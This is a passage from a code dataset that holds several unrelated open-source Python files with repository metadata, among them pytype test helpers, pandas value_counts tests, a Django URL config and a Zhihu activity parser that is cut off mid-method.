self.types = self.types.Visit(visitors.RemoveUnknownClasses())
# Remove "~list" etc.:
self.types = convert_structural.extract_local(self.types)
self.extract_locals = self.types
# TODO(pludemann): These flags are the same as those in main.py; there
# should be a way of ensuring that they're the same.
self.types = self.optimized_types = optimize.Optimize(
self.types, lossy=False, use_abcs=False,
max_union=7, remove_mutable=False)
self.types = self.canonical_types = pytd_utils.CanonicalOrdering(
self.types)
except Exception: # pylint: disable=broad-except
self.types = None
if not self.__exit__(*sys.exc_info()):
raise
def __enter__(self):
return self.types
def __exit__(self, error_type, value, traceback):
if not error_type:
return
log.error("*** unittest ERROR *** %s: %s", error_type.__name__, value)
_PrintErrorDebug("source", self.srccode)
if self.extra_verbose and self.inferred:
_PrintErrorDebug("inferred PyTD", pytd.Print(self.inferred))
if self.extra_verbose and self.optimized_types:
_PrintErrorDebug("optimized PyTD", pytd.Print(self.optimized_types))
if self.extra_verbose and self.extract_locals:
_PrintErrorDebug("extract_locals (removed unknown) PyTD",
pytd.Print(self.extract_locals))
if self.canonical_types:
_PrintErrorDebug("canonical PyTD", pytd.Print(self.canonical_types))
return False # re-raise the exception that was passed in
class InferenceTest(unittest.TestCase):
"""Base class for implementing tests that check PyTD output."""
PYTHON_VERSION = (2, 7) # can be overwritten by subclasses
def setUp(self):
self.bool = pytd.ClassType("bool")
self.dict = pytd.ClassType("dict")
self.float = pytd.ClassType("float")
self.complex = pytd.ClassType("complex")
self.int = pytd.ClassType("int")
if self.PYTHON_VERSION[0] == 2:
self.long = pytd.ClassType("long")
self.list = pytd.ClassType("list")
self.none_type = pytd.ClassType("NoneType")
self.object = pytd.ClassType("object")
self.set = pytd.ClassType("set")
self.frozenset = pytd.ClassType("frozenset")
self.str = pytd.ClassType("str")
self.bytes = pytd.ClassType("bytes")
self.bytearray = pytd.ClassType("bytearray")
self.tuple = pytd.ClassType("tuple")
self.unicode = pytd.ClassType("unicode")
self.generator = pytd.ClassType("generator")
self.function = pytd.ClassType("function")
self.anything = pytd.AnythingType()
self.nothing = pytd.NothingType()
self.module = pytd.ClassType("module")
self.file = pytd.ClassType("file")
# The various union types use pytd_utils.CanonicalOrdering()'s ordering:
self.intorstr = pytd.UnionType((self.int, self.str))
self.strorunicodeorbytes = pytd.UnionType(
(self.str, self.unicode, self.bytes))
self.intorfloat = pytd.UnionType((self.float, self.int))
self.intorfloatorstr = pytd.UnionType((self.float, self.int, self.str))
self.complexorstr = pytd.UnionType((self.complex, self.str))
# TODO(pludemann): fix the boolorintor... stuff when __builtins__
# is modified to exclude bool from the result
if self.PYTHON_VERSION[0] == 3:
self.intorfloatorlong = self.intorfloat
self.intorfloatorlongorcomplex = pytd.UnionType(
(self.int, self.float, self.complex))
else:
self.intorfloatorlong = pytd.UnionType((self.int, self.float, self.long))
self.boolorintorfloatorlongorcomplex = pytd.UnionType(
(self.bool, self.int, self.float, self.long, self.complex))
self.int_tuple = pytd.HomogeneousContainerType(self.tuple, (self.int,))
self.nothing_tuple = pytd.HomogeneousContainerType(self.tuple,
(self.nothing,))
self.intorfloat_tuple = pytd.HomogeneousContainerType(self.tuple,
(self.intorfloat,))
self.int_set = pytd.HomogeneousContainerType(self.set, (self.int,))
self.intorfloat_set = pytd.HomogeneousContainerType(self.set,
(self.intorfloat,))
# TODO(pludemann): simplify this (test_and2)
self.unknown_frozenset = pytd.HomogeneousContainerType(
self.frozenset, (self.anything,))
self.float_frozenset = pytd.HomogeneousContainerType(self.frozenset,
(self.float,))
self.empty_frozenset = pytd.HomogeneousContainerType(self.frozenset,
(self.nothing,))
self.int_list = pytd.HomogeneousContainerType(self.list, (self.int,))
self.str_list = pytd.HomogeneousContainerType(self.list, (self.str,))
self.intorfloat_list = pytd.HomogeneousContainerType(self.list,
(self.intorfloat,))
self.intorstr_list = pytd.HomogeneousContainerType(self.list,
(self.intorstr,))
self.anything_list = pytd.HomogeneousContainerType(self.list,
(self.anything,))
self.nothing_list = pytd.HomogeneousContainerType(self.list,
(self.nothing,))
self.int_int_dict = pytd.GenericType(self.dict, (self.int, self.int))
self.int_str_dict = pytd.GenericType(self.dict, (self.int, self.str))
self.str_int_dict = pytd.GenericType(self.dict, (self.str, self.int))
self.nothing_nothing_dict = pytd.GenericType(self.dict,
(self.nothing, self.nothing))
# For historical reasons (byterun), this method name is snakecase:
# TODO(kramm): Rename this function.
# pylint: disable=invalid-name
def assertNoErrors(self, code, raises=None,
pythonpath=(), find_pytd_import_ext=".pytd",
report_errors=True):
"""Run an inference smoke test for the given code."""
if raises is not None:
# TODO(kramm): support this
log.warning("Ignoring 'raises' parameter to assertNoErrors")
errorlog = errors.ErrorLog()
unit = infer.infer_types(
textwrap.dedent(code), self.PYTHON_VERSION, errorlog,
deep=False, solve_unknowns=False, reverse_operators=True,
pythonpath=pythonpath, find_pytd_import_ext=find_pytd_import_ext,
cache_unknowns=True)
if report_errors and errorlog.errors:
errorlog.print_to_stderr()
self.fail("Inferencer found %d errors" % len(errorlog))
unit.Visit(visitors.VerifyVisitor())
return pytd_utils.CanonicalOrdering(unit)
def assertNoCrash(self, code, **kwargs):
self.assertNoErrors(code, report_errors=False, **kwargs)
def InferAndCheck(self, code):
errorlog = errors.ErrorLog()
unit = infer.infer_types(
textwrap.dedent(code), self.PYTHON_VERSION, errorlog, deep=True,
reverse_operators=True, cache_unknowns=True)
unit.Visit(visitors.VerifyVisitor())
return pytd_utils.CanonicalOrdering(unit), errorlog
def InferFromFile(self, filename, pythonpath, find_pytd_import_ext=".pytd"):
errorlog = errors.ErrorLog()
with open(filename, "rb") as fi:
unit = infer.infer_types(fi.read(), self.PYTHON_VERSION, errorlog,
filename=filename, cache_unknowns=True,
pythonpath=pythonpath,
find_pytd_import_ext=find_pytd_import_ext)
unit.Visit(visitors.VerifyVisitor())
return pytd_utils.CanonicalOrdering(unit)
@classmethod
def SignatureHasReturnType(cls, sig, return_type):
for desired_type in pytd_utils.UnpackUnion(return_type):
if desired_type == return_type:
return True
elif isinstance(sig.return_type, pytd.UnionType):
return desired_type in sig.return_type.type_list
else:
return False
@classmethod
def HasSignature(cls, func, target):
for sig in func.signatures:
if (target.params == tuple(p.type for p in sig.params) and
cls.SignatureHasReturnType(sig, target.return_type)):
return True
return False
@classmethod
def HasExactSignature(cls, func, target):
for sig in func.signatures:
if (target.params == tuple(p.type for p in sig.params) and
target.return_type == sig.return_type):
return True
return False
def assertHasOnlySignatures(self, func, *sigs):
self.assertIsInstance(func, pytd.Function)
for parameter_types, return_type in sigs:
target = pytd.Signature(tuple(parameter_types), return_type, (), (),
False)
if not self.HasExactSignature(func, target):
self.fail("Could not find signature: {name}{target} in {func}".
format(name=func.name,
target=pytd.Print(target),
func=pytd.Print(func)))
self.assertEqual(len(func.signatures), len(sigs),
"{func} has the wrong number of signatures ({has}), "
"expected {expect}".
format(func=func,
has=len(func.signatures), expect=len(sigs)))
def assertHasSignature(self, func, parameter_types, return_type):
target = pytd.Signature(tuple(parameter_types), return_type, (), (), False)
if not self.HasSignature(func, target):
# TODO(pludemann): don't assume function is 'f'
self.fail("Could not find signature: f{} in {} ({} in {})".
format(pytd.Print(target), pytd.Print(func), target, func))
def assertNotHasSignature(self, func, parameter_types, return_type):
target = pytd.Signature(tuple(parameter_types), return_type, (), (), False)
if self.HasSignature(func, target):
# TODO(pludemann): don't assume function is 'f'
self.fail("Found signature: f{} -> {} in {}".
format(pytd.Print(target), pytd.Print(func)))
def assertOnlyHasReturnType(self, func, t):
"""Test that a given return type is the only one."""
ret = pytd_utils.JoinTypes(sig.return_type
for sig in func.signatures)
self.assertEquals(t, ret,
"Return type %r != %r" % (pytd.Print(t),
pytd.Print(ret)))
def assertHasReturnType(self, func, t):
"""Test that a given return type is present. Ignore extras."""
ret = pytd_utils.JoinTypes(sig.return_type
for sig in func.signatures)
if isinstance(ret, pytd.UnionType):
self.assertIn(t, ret.type_list,
"Return type %r not found in %r" % (pytd.Print(t),
pytd.Print(ret)))
else:
self.assertEquals(t, ret,
"Return type %r != %r" % (pytd.Print(ret),
pytd.Print(t)))
def assertHasAllReturnTypes(self, func, types):
"""Test that all given return types are present. Ignore extras."""
for t in types:
self.assertHasReturnType(func, t)
def assertIsIdentity(self, func):
"""Tests whether a given function is equivalent to the identity function."""
self.assertGreaterEqual(len(func.signatures), 1)
for sig in func.signatures:
self.assertEquals(len(sig.params), 1)
param1, = sig.params
self.assertEquals(param1.type, sig.return_type,
"Not identity: %r" % pytd.Print(func))
def assertErrorLogContains(self, errorlog, regexp):
for error in errorlog:
if re.compile(regexp, re.I | re.S).search(str(error)):
return
print >>sys.stderr, "Couldn't find regexp %r in errors:" % regexp
errorlog.print_to_stderr()
raise AssertionError("Couldn't find regexp %r in errors" % regexp)
def assertErrorLogDoesNotContain(self, errorlog, regexp):
for error in errorlog:
if re.compile(regexp, re.I | re.S).search(str(error)):
print >>sys.stderr, "Found regexp %r in errors:" % regexp
errorlog.print_to_stderr()
raise AssertionError("Found regexp %r in errors" % regexp)
def Infer(self, srccode, deep=False, solve_unknowns=False,
extract_locals=False, extra_verbose=False,
report_errors=True, **kwargs):
# Wraps Infer object to make it seem less magical
# See class Infer for more on the arguments
return Infer(self, srccode=srccode, deep=deep,
solve_unknowns=solve_unknowns, extract_locals=extract_locals,
extra_verbose=extra_verbose, report_errors=report_errors,
**kwargs)
def _InferAndVerify(self, src, report_errors=False, **kwargs):
"""Infer types for the source code treating it as a module.
Used by class Infer (which sets up a 'with' framework)
Args:
src: The source code of a module. Treat it as "__main__".
report_errors: Whether to fail if the type inferencer reports any errors
in the program.
      **kwargs: Keyword parameters to pass through to the type inferencer.
Raises:
AssertionError: If report_errors is True and we found errors.
Returns:
A pytd.TypeDeclUnit
"""
errorlog = errors.ErrorLog()
unit = infer.infer_types(src, self.PYTHON_VERSION, errorlog, **kwargs)
unit = pytd_utils.CanonicalOrdering(unit.Visit(visitors.VerifyVisitor()))
if report_errors and errorlog:
errorlog.print_to_stderr()
self.fail("Inferencer found %d errors" % len(errorlog))
return unit
def assertTypesMatchPytd(self, ty, pytd_src, version=None):
"""Parses pytd_src and compares with ty."""
# TODO(pludemann): This is a copy of pytd.parse.parser_test.Parse()
# TODO(pludemann): Consider using the pytd_tree to call
# assertHasOnlySignatures (or similar) to guard against the
# inferencer adding additional but harmless calls.
pytd_tree = parser.TypeDeclParser(version=version).Parse(
textwrap.dedent(pytd_src))
pytd_tree = pytd_tree.Visit(
visitors.ClassTypeToNamedType())
pytd_tree = pytd_tree.Visit(
visitors.CanonicalOrderingVisitor(sort_signatures=True))
pytd_tree.Visit(visitors.VerifyVisitor())
ty = ty.Visit(visitors.ClassTypeToNamedType())
ty = ty.Visit(visitors.AdjustSelf(force=True))
ty = ty.Visit(visitors.CanonicalOrderingVisitor(sort_signatures=True))
ty.Visit(visitors.VerifyVisitor())
ty_src = pytd.Print(ty) + "\n"
pytd_tree_src = pytd.Print(pytd_tree) + "\n"
log.info("====== ty ===")
_LogLines(log.info, ty_src)
log.info("=== TypeMatchPytd ===")
_LogLines(log.info, pytd_tree_src)
log.info("====== ====== ======")
# In the diff output, mark expected with "-" and actual with "+".
# (In other words, display a change from "working" to "broken")
self.assertMultiLineEqual(pytd_tree_src, ty_src)
def make_code(self, byte_array, name="testcode"):
"""Utility method for creating CodeType objects."""
return loadmarshal.CodeType(
argcount=0, kwonlyargcount=0, nlocals=2, stacksize=2, flags=0,
consts=[None, 1, 2], names=[], varnames=["x", "y"], filename="",
name=name, firstlineno=1, lnotab=[], freevars=[], cellvars=[],
code="".join(chr(c) for c in byte_array),
python_version=self.PYTHON_VERSION)
def _PrintErrorDebug(descr, value):
log.error("=============== %s ===========", descr)
_LogLines(log.error, value)
log.error("=========== end %s ===========", descr)
def _LogLines(log_cmd, lines):
for l in lines.split("\n"):
log_cmd("%s", l)
def main(debugging=False):
# TODO(ampere): This is just a useful hack. Should be replaced with real
# argument handling.
if debugging or len(sys.argv) > 1:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
unittest.main()
if __name__ == "__main__":
main()
| 43.15565 | 80 | 0.655682 |
8c0d6a377ec6fa60638528d8ecdd8c638b5410f3
| 2,223 |
py
|
Python
|
src/gen_drum_kit/main.py
|
peter-zenk/genDrumkit
|
a74bae332443db6424be46ebd32b8fffeac14ce1
|
[
"MIT"
] | 7 |
2020-06-25T15:36:17.000Z
|
2022-01-09T21:43:27.000Z
|
src/gen_drum_kit/main.py
|
peter-zenk/genDrumkit
|
a74bae332443db6424be46ebd32b8fffeac14ce1
|
[
"MIT"
] | 3 |
2022-01-09T20:44:52.000Z
|
2022-02-02T10:43:23.000Z
|
src/gen_drum_kit/main.py
|
peter-zenk/genDrumkit
|
a74bae332443db6424be46ebd32b8fffeac14ce1
|
[
"MIT"
] | 1 |
2020-08-16T18:17:26.000Z
|
2020-08-16T18:17:26.000Z
|
'''
Created on Jun 14, 2020
@author: peter
'''
import sys
import logging
from shutil import rmtree
from platform import system
from gen_drum_kit.parameter import Parameter
from gen_drum_kit.factory import ImporterFactory, ExporterFactory
logger = logging.getLogger(__name__)
class Main():
""" The top level class handling the program flow """
def __init__(self):
self._impFactory = ImporterFactory()
self._expFactory = ExporterFactory()
self._params = None # defined later
@staticmethod
def _check_environment():
if sys.hexversion < 50856688:
#check python version
print("INFO: Your version of python is " + str(sys.version_info))
sys.exit("ERROR: You must use at least python 3.8.2. Aborting ...")
if system() != "Linux":
# only Linux will be supported
print("INFO: You are running on :", system())
sys.exit("ERROR: You must run on a 'Linux' system!")
def _init_program(self):
# initialize the program context
self._check_environment()
self._params = Parameter()
def _cleanup(self):
# cleaning up on exit
logger.info("Cleaning up ...")
for item in self._params.clean_rm:
logger.debug("Removing '%s' ...", item)
try:
rmtree(item)
except:
logger.error("Could not remove '%s'!", item)
def run(self):
""" this is the main run() task to be called by the client script """
# command line, default settings, initial sanity checks
self._init_program()
logger.debug("Running in debug mode")
# create the importer and import data
Imp = self._impFactory.create(self._params)
Imp.importData()
# build the drum kit object based on the data read by the importer
Drumkit = Imp.buildDrumkitDB()
logger.debug(Drumkit)
# create the exporter and export the output drum kit with the data
# from the drum kit object
Exp = self._expFactory.create(Drumkit, self._params)
Exp.export()
self._cleanup()
logger.info("Finished program ...")
| 28.139241 | 79 | 0.615385 |
2514b11613ef6f87bf96bb9c3c0957d9d7b13f98
| 9,066 |
py
|
Python
|
pandas/tests/base/test_value_counts.py
|
monferrand/pandas
|
a3477c769b3d2ea4950ae69f8867e3b291b743c1
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 |
2020-06-04T21:46:19.000Z
|
2020-06-04T21:46:19.000Z
|
pandas/tests/base/test_value_counts.py
|
monferrand/pandas
|
a3477c769b3d2ea4950ae69f8867e3b291b743c1
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/base/test_value_counts.py
|
monferrand/pandas
|
a3477c769b3d2ea4950ae69f8867e3b291b743c1
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
import collections
from datetime import timedelta
from io import StringIO
import numpy as np
import pytest
from pandas._libs.tslib import iNaT
from pandas.compat.numpy import np_array_datetime64_compat
from pandas.core.dtypes.common import needs_i8_conversion
import pandas as pd
from pandas import (
DatetimeIndex,
Index,
Interval,
IntervalIndex,
Series,
Timedelta,
TimedeltaIndex,
)
import pandas._testing as tm
from pandas.tests.base.common import allow_na_ops
def test_value_counts(index_or_series_obj):
obj = index_or_series_obj
obj = np.repeat(obj, range(1, len(obj) + 1))
result = obj.value_counts()
counter = collections.Counter(obj)
expected = pd.Series(dict(counter.most_common()), dtype=np.int64, name=obj.name)
expected.index = expected.index.astype(obj.dtype)
if isinstance(obj, pd.MultiIndex):
expected.index = pd.Index(expected.index)
# TODO: Order of entries with the same count is inconsistent on CI (gh-32449)
if obj.duplicated().any():
result = result.sort_index()
expected = expected.sort_index()
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("null_obj", [np.nan, None])
def test_value_counts_null(null_obj, index_or_series_obj):
orig = index_or_series_obj
obj = orig.copy()
if not allow_na_ops(obj):
pytest.skip("type doesn't allow for NA operations")
elif len(obj) < 1:
pytest.skip("Test doesn't make sense on empty data")
elif isinstance(orig, pd.MultiIndex):
pytest.skip(f"MultiIndex can't hold '{null_obj}'")
values = obj.values
if needs_i8_conversion(obj.dtype):
values[0:2] = iNaT
else:
values[0:2] = null_obj
klass = type(obj)
repeated_values = np.repeat(values, range(1, len(values) + 1))
obj = klass(repeated_values, dtype=obj.dtype)
# because np.nan == np.nan is False, but None == None is True
# np.nan would be duplicated, whereas None wouldn't
counter = collections.Counter(obj.dropna())
expected = pd.Series(dict(counter.most_common()), dtype=np.int64)
expected.index = expected.index.astype(obj.dtype)
result = obj.value_counts()
if obj.duplicated().any():
# TODO:
# Order of entries with the same count is inconsistent on CI (gh-32449)
expected = expected.sort_index()
result = result.sort_index()
tm.assert_series_equal(result, expected)
# can't use expected[null_obj] = 3 as
# IntervalIndex doesn't allow assignment
new_entry = pd.Series({np.nan: 3}, dtype=np.int64)
expected = expected.append(new_entry)
result = obj.value_counts(dropna=False)
if obj.duplicated().any():
# TODO:
# Order of entries with the same count is inconsistent on CI (gh-32449)
expected = expected.sort_index()
result = result.sort_index()
tm.assert_series_equal(result, expected)
def test_value_counts_inferred(index_or_series):
klass = index_or_series
s_values = ["a", "b", "b", "b", "b", "c", "d", "d", "a", "a"]
s = klass(s_values)
expected = Series([4, 3, 2, 1], index=["b", "a", "d", "c"])
tm.assert_series_equal(s.value_counts(), expected)
if isinstance(s, Index):
exp = Index(np.unique(np.array(s_values, dtype=np.object_)))
tm.assert_index_equal(s.unique(), exp)
else:
exp = np.unique(np.array(s_values, dtype=np.object_))
tm.assert_numpy_array_equal(s.unique(), exp)
assert s.nunique() == 4
# don't sort, have to sort after the fact as not sorting is
# platform-dep
hist = s.value_counts(sort=False).sort_values()
expected = Series([3, 1, 4, 2], index=list("acbd")).sort_values()
tm.assert_series_equal(hist, expected)
# sort ascending
hist = s.value_counts(ascending=True)
expected = Series([1, 2, 3, 4], index=list("cdab"))
tm.assert_series_equal(hist, expected)
# relative histogram.
hist = s.value_counts(normalize=True)
expected = Series([0.4, 0.3, 0.2, 0.1], index=["b", "a", "d", "c"])
tm.assert_series_equal(hist, expected)
def test_value_counts_bins(index_or_series):
klass = index_or_series
s_values = ["a", "b", "b", "b", "b", "c", "d", "d", "a", "a"]
s = klass(s_values)
# bins
msg = "bins argument only works with numeric data"
with pytest.raises(TypeError, match=msg):
s.value_counts(bins=1)
s1 = Series([1, 1, 2, 3])
res1 = s1.value_counts(bins=1)
exp1 = Series({Interval(0.997, 3.0): 4})
tm.assert_series_equal(res1, exp1)
res1n = s1.value_counts(bins=1, normalize=True)
exp1n = Series({Interval(0.997, 3.0): 1.0})
tm.assert_series_equal(res1n, exp1n)
if isinstance(s1, Index):
tm.assert_index_equal(s1.unique(), Index([1, 2, 3]))
else:
exp = np.array([1, 2, 3], dtype=np.int64)
tm.assert_numpy_array_equal(s1.unique(), exp)
assert s1.nunique() == 3
# these return the same
res4 = s1.value_counts(bins=4, dropna=True)
intervals = IntervalIndex.from_breaks([0.997, 1.5, 2.0, 2.5, 3.0])
exp4 = Series([2, 1, 1, 0], index=intervals.take([0, 3, 1, 2]))
tm.assert_series_equal(res4, exp4)
res4 = s1.value_counts(bins=4, dropna=False)
intervals = IntervalIndex.from_breaks([0.997, 1.5, 2.0, 2.5, 3.0])
exp4 = Series([2, 1, 1, 0], index=intervals.take([0, 3, 1, 2]))
tm.assert_series_equal(res4, exp4)
res4n = s1.value_counts(bins=4, normalize=True)
exp4n = Series([0.5, 0.25, 0.25, 0], index=intervals.take([0, 3, 1, 2]))
tm.assert_series_equal(res4n, exp4n)
# handle NA's properly
s_values = ["a", "b", "b", "b", np.nan, np.nan, "d", "d", "a", "a", "b"]
s = klass(s_values)
expected = Series([4, 3, 2], index=["b", "a", "d"])
tm.assert_series_equal(s.value_counts(), expected)
if isinstance(s, Index):
exp = Index(["a", "b", np.nan, "d"])
tm.assert_index_equal(s.unique(), exp)
else:
exp = np.array(["a", "b", np.nan, "d"], dtype=object)
tm.assert_numpy_array_equal(s.unique(), exp)
assert s.nunique() == 3
s = klass({}) if klass is dict else klass({}, dtype=object)
expected = Series([], dtype=np.int64)
tm.assert_series_equal(s.value_counts(), expected, check_index_type=False)
# returned dtype differs depending on original
if isinstance(s, Index):
tm.assert_index_equal(s.unique(), Index([]), exact=False)
else:
tm.assert_numpy_array_equal(s.unique(), np.array([]), check_dtype=False)
assert s.nunique() == 0
def test_value_counts_datetime64(index_or_series):
klass = index_or_series
# GH 3002, datetime64[ns]
# don't test names though
txt = "\n".join(
[
"xxyyzz20100101PIE",
"xxyyzz20100101GUM",
"xxyyzz20100101EGG",
"xxyyww20090101EGG",
"foofoo20080909PIE",
"foofoo20080909GUM",
]
)
f = StringIO(txt)
df = pd.read_fwf(
f, widths=[6, 8, 3], names=["person_id", "dt", "food"], parse_dates=["dt"]
)
s = klass(df["dt"].copy())
s.name = None
idx = pd.to_datetime(
["2010-01-01 00:00:00", "2008-09-09 00:00:00", "2009-01-01 00:00:00"]
)
expected_s = Series([3, 2, 1], index=idx)
tm.assert_series_equal(s.value_counts(), expected_s)
expected = np_array_datetime64_compat(
["2010-01-01 00:00:00", "2009-01-01 00:00:00", "2008-09-09 00:00:00"],
dtype="datetime64[ns]",
)
if isinstance(s, Index):
tm.assert_index_equal(s.unique(), DatetimeIndex(expected))
else:
tm.assert_numpy_array_equal(s.unique(), expected)
assert s.nunique() == 3
# with NaT
s = df["dt"].copy()
s = klass(list(s.values) + [pd.NaT])
result = s.value_counts()
assert result.index.dtype == "datetime64[ns]"
tm.assert_series_equal(result, expected_s)
result = s.value_counts(dropna=False)
expected_s[pd.NaT] = 1
tm.assert_series_equal(result, expected_s)
unique = s.unique()
assert unique.dtype == "datetime64[ns]"
# numpy_array_equal cannot compare pd.NaT
if isinstance(s, Index):
exp_idx = DatetimeIndex(expected.tolist() + [pd.NaT])
tm.assert_index_equal(unique, exp_idx)
else:
tm.assert_numpy_array_equal(unique[:3], expected)
assert pd.isna(unique[3])
assert s.nunique() == 3
assert s.nunique(dropna=False) == 4
# timedelta64[ns]
td = df.dt - df.dt + timedelta(1)
td = klass(td, name="dt")
result = td.value_counts()
expected_s = Series([6], index=[Timedelta("1day")], name="dt")
tm.assert_series_equal(result, expected_s)
expected = TimedeltaIndex(["1 days"], name="dt")
if isinstance(td, Index):
tm.assert_index_equal(td.unique(), expected)
else:
tm.assert_numpy_array_equal(td.unique(), expected.values)
td2 = timedelta(1) + (df.dt - df.dt)
td2 = klass(td2, name="dt")
result2 = td2.value_counts()
tm.assert_series_equal(result2, expected_s)
| 32.729242 | 84 | 0.637326 |
54ced15b7ea1cd138adc9c261eff66978dc4891f
| 337 |
py
|
Python
|
test_project/main/urls.py
|
CloudRunnerInc/django-admin-smoke-tests
|
8f83ce0f6f8947575040befbb8763de195c7d506
|
[
"BSD-3-Clause"
] | 13 |
2015-01-12T09:32:38.000Z
|
2021-11-18T06:38:42.000Z
|
test_project/main/urls.py
|
CloudRunnerInc/django-admin-smoke-tests
|
8f83ce0f6f8947575040befbb8763de195c7d506
|
[
"BSD-3-Clause"
] | 18 |
2015-06-12T18:07:55.000Z
|
2020-09-05T09:29:45.000Z
|
test_project/main/urls.py
|
CloudRunnerInc/django-admin-smoke-tests
|
8f83ce0f6f8947575040befbb8763de195c7d506
|
[
"BSD-3-Clause"
] | 9 |
2015-06-15T16:40:52.000Z
|
2020-06-16T01:07:28.000Z
|
from django.conf.urls import url
urlpatterns = [
url(r'^posts/(?P<pk>.+)/$', lambda **kwargs: '', name="post-detail"),
url(r'^hasprimaryslug/(?P<pk>[\w-]+)/$', lambda **kwargs: '',
name="hasprimaryslug-detail"),
url(r'^hasprimaryuuid/(?P<pk>[\w-]+)/$', lambda **kwargs: '',
name="hasprimaryuuid-detail"),
]
| 30.636364 | 73 | 0.569733 |
0ef0211db90dc033de056523d5abaf4d80827327
| 225 |
py
|
Python
|
tests/parser/wellfounded.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.10.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
t(Z) :- t0(Z).
t(Z) :- g(X,Y,Z), t(X), not t(Y).
t0(2).
g(5,1,3).
g(1,2,4).
g(3,4,5).
"""
output = """
t(Z) :- t0(Z).
t(Z) :- g(X,Y,Z), t(X), not t(Y).
t0(2).
g(5,1,3).
g(1,2,4).
g(3,4,5).
"""
| 10.714286 | 34 | 0.342222 |
1fed3a8fb5f00cbed51ba9fbbffb1a44c47b986a
| 7,145 |
py
|
Python
|
zhihu/activity.py
|
xiaoxing1120/zhihu-spider
|
6ab2a0391523d04bd5d537560bb4836a16b3de47
|
[
"MIT"
] | 1 |
2016-10-10T12:28:08.000Z
|
2016-10-10T12:28:08.000Z
|
zhihu/activity.py
|
evsward/zhihu-py3
|
6ab2a0391523d04bd5d537560bb4836a16b3de47
|
[
"MIT"
] | null | null | null |
zhihu/activity.py
|
evsward/zhihu-py3
|
6ab2a0391523d04bd5d537560bb4836a16b3de47
|
[
"MIT"
] | 1 |
2016-09-15T09:01:16.000Z
|
2016-09-15T09:01:16.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime
from .common import *
from .acttype import ActType
from .question import Question
from .answer import Answer
from .column import Column
from .post import Post
from .topic import Topic
from .author import Author, ANONYMOUS
from .collection import Collection
class Activity:
"""用户动态类,请使用Author.activities获取."""
def __init__(self, act, session, author):
"""创建用户动态类实例.
:param bs4.element.Tag act: 表示用户动态的页面元素
:param Session session: 使用的网络会话
:param Author author: Activity 所属的用户对象
:return: 用户动态对象
:rtype: Activity
:说明:
根据Activity.type不同可以获取不同属性,具体请看 :class:`.ActType`
"""
self._session = session
self._author = author
self._type = ActType.from_str(act.attrs['data-type-detail'])
useless_tag = act.div.find('a', class_='zg-link')
if useless_tag is not None:
useless_tag.extract()
attribute = self._get_assemble_method(self.type)(act)
self._attr = attribute.__class__.__name__.lower()
setattr(self, self._attr, attribute)
self._time = datetime.fromtimestamp(int(act['data-time']))
@property
def type(self):
"""
        :return: the type of this user activity, see :class:`.ActType`
:rtype: class:`.ActType`
"""
return self._type
@property
def content(self):
"""获取此对象中能提供的那个属性,对应表请查看 :class:`.ActType` 类.
:return: 对象提供的对象
:rtype: Author or Question or Answer or Topic or Column or Post
"""
return getattr(self, self._attr)
@property
def time(self):
"""
        :return: the time at which the user performed this Activity
:rtype: datetime.datetime
"""
return self._time
def __find_post(self, act):
try:
column_url = act.find('a', class_='column_link')['href']
column_name = act.find('a', class_='column_link').text
column = Column(column_url, column_name, session=self._session)
except TypeError:
column = None
try:
author_tag = act.find('div', class_='author-info')
author_url = Zhihu_URL + author_tag.a['href']
author_name = author_tag.a.text
author_motto = author_tag.span.text if author_tag.span else ''
author = Author(author_url, author_name, author_motto,
session=self._session)
except TypeError:
author = ANONYMOUS
post_url = act.find('a', class_='post-link')['href']
post_title = act.find('a', class_='post-link').text
post_comment_num, post_upvote_num = self._parse_un_cn(act)
return Post(post_url, column, author, post_title,
post_upvote_num, post_comment_num,
session=self._session)
def _assemble_create_post(self, act):
return self.__find_post(act)
def _assemble_voteup_post(self, act):
return self.__find_post(act)
def _assemble_follow_column(self, act):
return Column(act.div.a['href'], act.div.a.text, session=self._session)
def _assemble_follow_topic(self, act):
topic_url = Zhihu_URL + act.div.a['href']
topic_name = act.div.a['title']
return Topic(topic_url, topic_name, session=self._session)
def _assemble_answer_question(self, act):
question_url = Zhihu_URL + re_a2q.match(act.div.find_all('a')[-1]['href']).group(1)
question_title = act.div.find_all('a')[-1].text
question = Question(question_url, question_title, session=self._session)
answer_url = Zhihu_URL + act.div.find_all('a')[-1]['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, self._author, answer_upvote_num, session=self._session)
def _assemble_voteup_answer(self, act):
question_url = Zhihu_URL + re_a2q.match(act.div.a['href']).group(1)
question_title = act.div.a.text
question = Question(question_url, question_title, session=self._session)
try_find_author = act.find_all('a', class_='author-link', href=re.compile('^/people/[^/]*$'))
if len(try_find_author) == 0:
author_url = None
author_name = '匿名用户'
author_motto = ''
photo_url = None
else:
try_find_author = try_find_author[-1]
author_url = Zhihu_URL + try_find_author['href']
author_name = try_find_author.text
try_find_motto = try_find_author.parent.span
if try_find_motto is None:
author_motto = ''
else:
author_motto = try_find_motto['title']
photo_url = PROTOCOL + try_find_author.parent.a.img[
'src'].replace('_s', '_r')
author = Author(author_url, author_name, author_motto,
photo_url=photo_url, session=self._session)
answer_url = Zhihu_URL + act.div.a['href']
answer_comment_num, answer_upvote_num = self._parse_un_cn(act)
return Answer(answer_url, question, author, answer_upvote_num, session=self._session)
def _assemble_ask_question(self, act):
return Question(Zhihu_URL + act.div.contents[3]['href'],
list(act.div.children)[3].text,
session=self._session)
def _assemble_follow_question(self, act):
